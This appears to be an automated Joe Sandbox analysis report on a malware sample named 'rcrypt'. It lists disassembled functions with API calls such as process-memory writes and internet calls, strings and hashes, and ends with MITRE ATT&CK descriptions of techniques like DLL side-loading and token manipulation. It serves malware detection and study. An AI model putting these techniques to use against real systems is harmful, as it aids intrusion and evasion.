Snapshot File: hcaresult_0_2_f0000_rcrypt.jbxd

Similarity

API ID: Window$ColorCreateMessageObjectRectSendStock
String ID: static
API String ID: 1983116058-2160076837
Opcode ID: a425c06879a737308b675ba02efa151c6d1666da6d8061128646bc0b1dbe71f3
Instruction ID: 2335e6cc4feb8b24d98760adea1598464a1c3323c32b43c374e7475f176e3ed4
Opcode Fuzzy Hash: a425c06879a737308b675ba02efa151c6d1666da6d8061128646bc0b1dbe71f3
Instruction Fuzzy Hash: 81213D72514609AFDB04DFA8DD45AFA7BB8FB08314F044629FD59E3250D734E851DB60

Function 00152E9E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 63windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00152F11
GetMenuItemInfoW.USER32(00000030,?,00000000,00000030), ref: 00152F30

Strings

0, xrefs: 00152F07

Memory Dump Source

Source File: 00000000.00000002.1318694486.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true

Associated: 00000000.00000002.1318642599.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318799341.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318799341.00000000001A5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318850138.00000000001AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318867846.00000000001B8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f0000_rcrypt.jbxd

Similarity

API ID: InfoItemMenu_memset
String ID: 0
API String ID: 2223754486-4108050209
Opcode ID: 68e019cf5bfbe79f6d2d6672990d62335f8d5e2ad6f3715cd3db94ee73b898f5
Instruction ID: b023e5c11b42b9edd9454251bded2bcf7f6ae59436f93855bc42365f81d6d5a1
Opcode Fuzzy Hash: 68e019cf5bfbe79f6d2d6672990d62335f8d5e2ad6f3715cd3db94ee73b898f5
Instruction Fuzzy Hash: C911B233901214EBDB24DB58EC45B9D77B9EB17311F1501B6EC64AB2A0D7B0AD48C7D1

Function 001624CA Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 62networkCOMMON

Download Yara Rule

APIs

InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 00162520
InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 00162549

Strings

<local>, xrefs: 00162511

Memory Dump Source

Source File: 00000000.00000002.1318694486.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true

Associated: 00000000.00000002.1318642599.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318799341.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318799341.00000000001A5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318850138.00000000001AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318867846.00000000001B8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f0000_rcrypt.jbxd

Similarity

API ID: Internet$OpenOption
String ID: <local>
API String ID: 942729171-4266983199
Opcode ID: 958fec56a52c705aaa79b3a1a2b7e7a1817ab05adf46e54092b94e8031f1f945
Instruction ID: b493ff21a3a0d4ad87312187a8945a3a5496acbd94bfed1af5f945e3aec58590
Opcode Fuzzy Hash: 958fec56a52c705aaa79b3a1a2b7e7a1817ab05adf46e54092b94e8031f1f945
Instruction Fuzzy Hash: 8911C270541A25BEDB388F518C99EFBFF68FF06751F10812AF94656040D77069A1DAF0

Function 00178752 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 62windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,?,?,?), ref: 0017879F

Strings

@U=u, xrefs: 0017879F, 001787DB

Memory Dump Source

Source File: 00000000.00000002.1318694486.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true

Associated: 00000000.00000002.1318642599.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318799341.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318799341.00000000001A5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318850138.00000000001AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318867846.00000000001B8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f0000_rcrypt.jbxd

Similarity

API ID: MessageSend
String ID: @U=u
API String ID: 3850602802-2594219639
Opcode ID: b2c9bf69527f3bfcfa194d79b0eb3161598c4fb86cb6106b7c343685470dd3eb
Instruction ID: c8f2fe5e506d940d24edd0f6038924ff055eafd53091f7ff9dcf18c455a21914
Opcode Fuzzy Hash: b2c9bf69527f3bfcfa194d79b0eb3161598c4fb86cb6106b7c343685470dd3eb
Instruction Fuzzy Hash: BA21F976600109EF8B19DF94D8848EA7BB5FB4C340B114158FE0AA7360DB31EDA1DBA0

Function 00176825 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 59windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00000401,?,00000000), ref: 0017689B

Strings

@U=u, xrefs: 0017689B
button, xrefs: 00176872

Memory Dump Source

Source File: 00000000.00000002.1318694486.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true

Associated: 00000000.00000002.1318642599.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318799341.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318799341.00000000001A5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318850138.00000000001AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318867846.00000000001B8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f0000_rcrypt.jbxd

Similarity

API ID: MessageSend
String ID: @U=u$button
API String ID: 3850602802-1762282863
Opcode ID: 7a18543d5d966288e297065fab1df6252e42d8803974251fac36abcd9092ae0e
Instruction ID: fdacf5cf92da0c7548d1e927be78939e33319423c0c7c38f07dfbc02f57c167e
Opcode Fuzzy Hash: 7a18543d5d966288e297065fab1df6252e42d8803974251fac36abcd9092ae0e
Instruction Fuzzy Hash: 8B110432150209ABDF018F60CC41FEA377AFF18314F118218FE58A7190C776E891AB51

Function 00177AFB Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 56windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,0000133E,00000000,?), ref: 00177B47

Strings

@U=u, xrefs: 00177B47

Memory Dump Source

Source File: 00000000.00000002.1318694486.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true

Associated: 00000000.00000002.1318642599.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318799341.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318799341.00000000001A5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318850138.00000000001AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318867846.00000000001B8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f0000_rcrypt.jbxd

Similarity

API ID: MessageSend
String ID: @U=u
API String ID: 3850602802-2594219639
Opcode ID: ecbaf2a3e81cda3578c426d52a7f8888dcc27e7a66211b6b5f499d085da9c323
Instruction ID: 1ed1db79e52eb644a2396cdc5c73b0aca80d9aa60e6cc065096a6a5609784c1f
Opcode Fuzzy Hash: ecbaf2a3e81cda3578c426d52a7f8888dcc27e7a66211b6b5f499d085da9c323
Instruction Fuzzy Hash: B411D070504344AFDB20DF74C891AE7B7F8BF06310F10891DE9AE97291DB7169419BA0

Function 001680A0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 55networkCOMMON

Download Yara Rule

APIs

Part of subcall function 0016830B: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,?,?,001680C8,?,00000000,?,?), ref: 00168322

inet_addr.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 001680CB
htons.WSOCK32(00000000,?,00000000), ref: 00168108

Strings

255.255.255.255, xrefs: 001680E3

Memory Dump Source

Source File: 00000000.00000002.1318694486.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true

Associated: 00000000.00000002.1318642599.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318799341.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318799341.00000000001A5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318850138.00000000001AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318867846.00000000001B8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f0000_rcrypt.jbxd

Similarity

API ID: ByteCharMultiWidehtonsinet_addr
String ID: 255.255.255.255
API String ID: 2496851823-2422070025
Opcode ID: 4db01e6857552e2bab8d4ebe89aded49d44b46a155c1055755f2e0f7d92f9afc
Instruction ID: 786dc8cfeba7ba28252588565b95879ebe60b472854a2d96f03a8c03f7d4b9a9
Opcode Fuzzy Hash: 4db01e6857552e2bab8d4ebe89aded49d44b46a155c1055755f2e0f7d92f9afc
Instruction Fuzzy Hash: 13110834100209ABCB24AF64CC46FFEB334FF15310F10861AFA1597292DB31A865C791

Function 00149989 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 55windowCOMMON

Download Yara Rule

APIs

Part of subcall function 001519CC: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00149778,?,?,00000034,00000800,?,00000034), ref: 001519F6

SendMessageW.USER32(?,0000102B,?,00000000), ref: 001499EB
SendMessageW.USER32(?,0000102B,?,00000000), ref: 00149A10

Strings

@U=u, xrefs: 001499EB, 00149A10

Memory Dump Source

Source File: 00000000.00000002.1318694486.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true

Associated: 00000000.00000002.1318642599.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318799341.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318799341.00000000001A5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318850138.00000000001AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318867846.00000000001B8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f0000_rcrypt.jbxd

Similarity

API ID: MessageSend$MemoryProcessWrite
String ID: @U=u
API String ID: 1195347164-2594219639
Opcode ID: 6b3d44050e71ea783d13636c511ceb3dd24db6a5a47c5580f71dc22acf12459a
Instruction ID: ff9b5f1a40fe86d0589d4a94f503680b512e6fd7f3e2f4eb02ab03a6ee65ce97
Opcode Fuzzy Hash: 6b3d44050e71ea783d13636c511ceb3dd24db6a5a47c5580f71dc22acf12459a
Instruction Fuzzy Hash: 4C01FE72940118EBDB21AF64DC46FEFBB78EB14320F10416AF955A70D1DBB06D95CB60

Function 00149AB7 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 50windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00000406,00000000,00000000), ref: 00149ADD
SendMessageW.USER32(?,0000040D,?,00000000), ref: 00149B10

Part of subcall function 00151997: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,001497A7,?,?,00000800,?,00001073,00000000,?,?), ref: 001519C1

Part of subcall function 000F7D2C: _memmove.LIBCMT ref: 000F7D66

Strings

@U=u, xrefs: 00149ADD, 00149B10

Memory Dump Source

Source File: 00000000.00000002.1318694486.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true

Associated: 00000000.00000002.1318642599.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318799341.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318799341.00000000001A5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318850138.00000000001AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318867846.00000000001B8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f0000_rcrypt.jbxd

Similarity

API ID: MessageSend$MemoryProcessRead_memmove
String ID: @U=u
API String ID: 339422723-2594219639
Opcode ID: 5600f177f75a7420c5f6a849eaff2f5923854d921c2b13c326f4b494d9bf76ae
Instruction ID: 4bc06781b292a1cb936c2b29009be52bbe23fbd7d8200b232e66c266ccd3926e
Opcode Fuzzy Hash: 5600f177f75a7420c5f6a849eaff2f5923854d921c2b13c326f4b494d9bf76ae
Instruction Fuzzy Hash: B8015E71801118EFDB60EE50DC81EEA777CFB24340F4080A9BA8996151DF315E99CB90

Function 0017C86D Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46windowCOMMON

Download Yara Rule

APIs

Part of subcall function 000F2612: GetWindowLongW.USER32(?,000000EB), ref: 000F2623

DefDlgProcW.USER32(?,0000002B,?,?,?,?,?,?,?,0012BB8A,?,?,?), ref: 0017C8E1

Part of subcall function 000F25DB: GetWindowLongW.USER32(?,000000EB), ref: 000F25EC

SendMessageW.USER32(?,00000401,00000000,00000000), ref: 0017C8C7

Strings

@U=u, xrefs: 0017C8C7

Memory Dump Source

Source File: 00000000.00000002.1318694486.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true

Associated: 00000000.00000002.1318642599.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318799341.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318799341.00000000001A5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318850138.00000000001AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318867846.00000000001B8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f0000_rcrypt.jbxd

Similarity

API ID: LongWindow$MessageProcSend
String ID: @U=u
API String ID: 982171247-2594219639
Opcode ID: e5c187f80acff464557a860ddde56b4dbbe70c8612ad51cc283b91914a2d4418
Instruction ID: 7f95ccbba7166b529c5f7e8af452f5e08bc67df9dce4350b94637ed4c12befc2
Opcode Fuzzy Hash: e5c187f80acff464557a860ddde56b4dbbe70c8612ad51cc283b91914a2d4418
Instruction Fuzzy Hash: 8101D431200204ABCB215F14CC94E6A3BB6FF99724F14412CF9594B6E1CB31A892EB92

Function 00149A1E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 35windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00149A2E
SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00149A46

Strings

@U=u, xrefs: 00149A2E, 00149A46

Memory Dump Source

Source File: 00000000.00000002.1318694486.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true

Associated: 00000000.00000002.1318642599.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318799341.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318799341.00000000001A5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318850138.00000000001AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318867846.00000000001B8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f0000_rcrypt.jbxd

Similarity

API ID: MessageSend
String ID: @U=u
API String ID: 3850602802-2594219639
Opcode ID: aa20ed6f66480f7eaeab6c68aeebc92f21fccfa3843369eabdfac57492f67af4
Instruction ID: 7f6d4ec431a9f2def3af43e4560e2d691f8d4ef1f59c0ec82a1c4f0691fa6cd7
Opcode Fuzzy Hash: aa20ed6f66480f7eaeab6c68aeebc92f21fccfa3843369eabdfac57492f67af4
Instruction Fuzzy Hash: 13E09235382361B6F63056258C4EFD76F59EB99F61F210039BB05AA1F1CBD24CD282A0

Function 0014A1A8 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 34windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 0014A1BA
SendMessageW.USER32(?,0000110A,00000000,00000000), ref: 0014A1EA

Strings

@U=u, xrefs: 0014A1BA, 0014A1EA

Memory Dump Source

Source File: 00000000.00000002.1318694486.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true

Associated: 00000000.00000002.1318642599.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318799341.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318799341.00000000001A5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318850138.00000000001AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318867846.00000000001B8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f0000_rcrypt.jbxd

Similarity

API ID: MessageSend
String ID: @U=u
API String ID: 3850602802-2594219639
Opcode ID: 1150e11652c2c408206809f9352d51f23a80f4f8b31bfe060bc241b60add6fab
Instruction ID: 17bd2c846fad89ab1cd1ef55334e62fa63835336d41aa70c7973b4c05c2c28e1
Opcode Fuzzy Hash: 1150e11652c2c408206809f9352d51f23a80f4f8b31bfe060bc241b60add6fab
Instruction Fuzzy Hash: A0F0A775380304BBEA152A90DC46FE73B2DFF18B91F114028F7095A0E1D6E25C819790

Function 0014A327 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 30windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00149E2E: SendMessageW.USER32(?,0000110A,00000000,00000000), ref: 00149E47
Part of subcall function 00149E2E: SendMessageW.USER32(?,0000110A,00000004,00000000), ref: 00149E81

SendMessageW.USER32(?,0000110B,00000005,00000000), ref: 0014A34B
SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 0014A35B

Strings

@U=u, xrefs: 0014A34B, 0014A35B

Memory Dump Source

Source File: 00000000.00000002.1318694486.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true

Associated: 00000000.00000002.1318642599.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318799341.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318799341.00000000001A5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318850138.00000000001AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318867846.00000000001B8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f0000_rcrypt.jbxd

Similarity

API ID: MessageSend
String ID: @U=u
API String ID: 3850602802-2594219639
Opcode ID: e22592dbe52507b1cfc241ad1d6445e209b43aac6bb36b3bb9476fa6f0d8f0c2
Instruction ID: 1381af6e1c35cfb4dd73a3b0a5c78cb85bb4f8a83b50c08017f3de31a803301d
Opcode Fuzzy Hash: e22592dbe52507b1cfc241ad1d6445e209b43aac6bb36b3bb9476fa6f0d8f0c2
Instruction Fuzzy Hash: BBE0D8792843057FF6251F619C4AE97372CEB48B51F120039B300550B0EFA28C906520

Function 001551CA Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 29COMMON

Download Yara Rule

APIs

GetClassNameW.USER32(?,?,00000100), ref: 001551E8
_wcscmp.LIBCMT ref: 001551FA

Strings

#32770, xrefs: 001551F4

Memory Dump Source

Source File: 00000000.00000002.1318694486.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true

Associated: 00000000.00000002.1318642599.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318799341.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318799341.00000000001A5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318850138.00000000001AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318867846.00000000001B8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f0000_rcrypt.jbxd

Similarity

API ID: ClassName_wcscmp
String ID: #32770
API String ID: 2292705959-463685578
Opcode ID: 3429165dbf4534788204347d90306878176afd60cad6642f8c935d63678a45c7
Instruction ID: 46549a77036c0272918de527d3a900692533314b37c0fef4988c01b769f129e8
Opcode Fuzzy Hash: 3429165dbf4534788204347d90306878176afd60cad6642f8c935d63678a45c7
Instruction Fuzzy Hash: 1EE0613250022D57D7209695EC05FA7F7ACEF41731F00016BFD14D3050D760998587D0

Function 001481BC Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 22windowCOMMON

Download Yara Rule

APIs

MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 001481CA

Part of subcall function 00113598: _doexit.LIBCMT ref: 001135A2

Strings

AutoIt, xrefs: 001481BE
Error allocating memory., xrefs: 001481C3

Memory Dump Source

Source File: 00000000.00000002.1318694486.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true

Associated: 00000000.00000002.1318642599.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318799341.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318799341.00000000001A5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318850138.00000000001AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318867846.00000000001B8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f0000_rcrypt.jbxd

Similarity

API ID: Message_doexit
String ID: AutoIt$Error allocating memory.
API String ID: 1993061046-4017498283
Opcode ID: 5e09e51eb5d5aa9c2c0f18e936437355677e77aa4ec35ded5690ef5446bf5dbc
Instruction ID: 80d5666552d150cd47d820a57a95be7f60b6e6044626f9d8bb37c4a465c52526
Opcode Fuzzy Hash: 5e09e51eb5d5aa9c2c0f18e936437355677e77aa4ec35ded5690ef5446bf5dbc
Instruction Fuzzy Hash: 27D05B323C531C36D21432A86D0BFCB79484B19F51F104426BB08555D38FD155C243D9

Function 0012B511 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 22COMMON

Download Yara Rule

APIs

Part of subcall function 0012B564: _memset.LIBCMT ref: 0012B571

Part of subcall function 00110B84: InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000000,?,0012B540,?,?,?,000F100A), ref: 00110B89

IsDebuggerPresent.KERNEL32(?,?,?,000F100A), ref: 0012B544
OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,000F100A), ref: 0012B553

Strings

ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 0012B54E

Memory Dump Source

Source File: 00000000.00000002.1318694486.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true

Associated: 00000000.00000002.1318642599.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318799341.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318799341.00000000001A5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318850138.00000000001AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318867846.00000000001B8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f0000_rcrypt.jbxd

Similarity

API ID: CountCriticalDebugDebuggerInitializeOutputPresentSectionSpinString_memset
String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
API String ID: 3158253471-631824599
Opcode ID: b8f650b507117a3b7e6b4abc4a2b6cbf61fc4f5bf3000378cc71c40d71716fc7
Instruction ID: 4b1242564ec4dc36b11bd7b5c5d0a8762cf6abc01d280fac8fdff36d2dd2c8d0
Opcode Fuzzy Hash: b8f650b507117a3b7e6b4abc4a2b6cbf61fc4f5bf3000378cc71c40d71716fc7
Instruction Fuzzy Hash: 6BE06D706043208FD721DF28F9443827BE0BF14704F04892DE446CAA51DBB8D884CBA1

Function 001498BF Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 14windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 001498CB
SendMessageW.USER32(00000000,00001200,00000000,00000000), ref: 001498D9

Strings

@U=u, xrefs: 001498CB, 001498D9

Memory Dump Source

Source File: 00000000.00000002.1318694486.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true

Associated: 00000000.00000002.1318642599.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318799341.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318799341.00000000001A5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318850138.00000000001AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318867846.00000000001B8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f0000_rcrypt.jbxd

Similarity

API ID: MessageSend
String ID: @U=u
API String ID: 3850602802-2594219639
Opcode ID: a2a297d18ad5932ba865a791a408f7a99c0736c0b32f08c9a2e5a546ab7e89dd
Instruction ID: 6a6fbcdcbc6c97fc4aa6257f54b89c96c9b0f53e65ecf1a6d95846367f36f888
Opcode Fuzzy Hash: a2a297d18ad5932ba865a791a408f7a99c0736c0b32f08c9a2e5a546ab7e89dd
Instruction Fuzzy Hash: D5C00271181180BAEA211B77AC0DD873E3DE7CAF52B11016CB215954B5866500D6D624

Description:	Adversaries may obtain and abuse credentials of existing accounts as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Compromised credentials may be used to bypass access controls placed on various resources on systems within the network and may even be used for persistent access to remote systems and externally available services, such as VPNs, Outlook Web Access, network devices, and remote desktop.Compromised credentials may also grant an adversary increased privilege to specific systems or access to restricted areas of the network. Adversaries may choose not to use malware or tools in conjunction with the legitimate access those credentials provide to make it harder to detect their presence.
Tactics:	Defense Evasion, Initial Access, Persistence, Privilege Escalation
Data Sources:	Logon Session: Logon Session Creation, Logon Session: Logon Session Metadata, User Account: User Account Authentication
Platforms:	Azure AD, Containers, Google Workspace, IaaS, Linux, macOS, Network, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may exploit software vulnerabilities in an attempt to elevate privileges. Exploitation of a software vulnerability occurs when an adversary takes advantage of a programming error in a program, service, or within the operating system software or kernel itself to execute adversary-controlled code. Security constructs such as permission levels will often hinder access to information and use of certain techniques, so adversaries will likely need to perform privilege escalation to include use of software exploitation to circumvent those restrictions.
Tactics:	Privilege Escalation
Data Sources:	Driver: Driver Load, Process: Process Creation
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Active Directory: Active Directory Object Modification, Command: Command Execution, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Metadata
Platforms:	Windows
Url:	Open detailed description by Mitre

